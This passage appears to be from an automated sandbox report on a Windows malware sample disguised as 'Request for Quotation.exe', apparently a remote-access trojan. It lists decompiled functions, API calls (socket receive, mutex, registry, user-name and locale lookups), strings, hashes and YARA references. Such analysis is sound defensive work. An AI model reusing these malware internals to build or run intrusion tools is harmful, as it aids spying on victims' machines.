                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                                                                • printf.MSVCRT ref: 004025F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                                                                • CreateThread.KERNELBASE(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                                                                Strings
                                                                                • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                                                                • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                                                                • API String ID: 3715082883-586133315
                                                                                • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                                                                • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                                                                • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                                                                • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                • malloc.MSVCRT ref: 00402175
                                                                                • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                                                                  • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                                                                  • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                                                                  • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                                                                  • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                                                                  • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                                                                  • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                                                                  • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6D195DF0), ref: 00402302
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                                                                  • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                                                                  • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                                                                  • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                                                                  • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                                                                • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                                                                • String ID:
                                                                                • API String ID: 2200674315-0
                                                                                • Opcode ID: d5f7163a8c610c7b444fe9c40a2ee50b7bc9fd52d4926215f829fcb5400827dc
                                                                                • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                                                                • Opcode Fuzzy Hash: d5f7163a8c610c7b444fe9c40a2ee50b7bc9fd52d4926215f829fcb5400827dc
                                                                                • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12); // executed
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16); // executed
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                                                                0x0041216f
                                                                                0x0041217d
                                                                                0x00412186
                                                                                0x00412195
                                                                                0x004121a5
                                                                                0x004121ae
                                                                                0x004121b9
                                                                                0x004121bd
                                                                                0x004121c9
                                                                                0x004121d4
                                                                                0x004121dd
                                                                                0x004121e7

                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                                                                • String ID:
                                                                                • API String ID: 3382107156-0
                                                                                • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                                                                • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                                                                • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                                                                • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E7D, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00409E7D(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                                                                0x00409e8e
                                                                                0x00409e9f
                                                                                0x00409ea9

                                                                                APIs
                                                                                • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 4090406865-0
                                                                                • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                                                                • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                                                                • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                                                                • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408C98, Relevance: 263.4, APIs: 134, Strings: 16, Instructions: 938synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                  • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                  • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                  • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                  • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                                                                • OpenMutexA.KERNEL32 ref: 00408E80
                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                                                                • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quotation.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                                                                  • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                                                                  • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                                                                  • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                                                                • wcslen.MSVCRT ref: 004090DB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                                                                  • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                                                                  • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                                                                  • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                                                                  • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
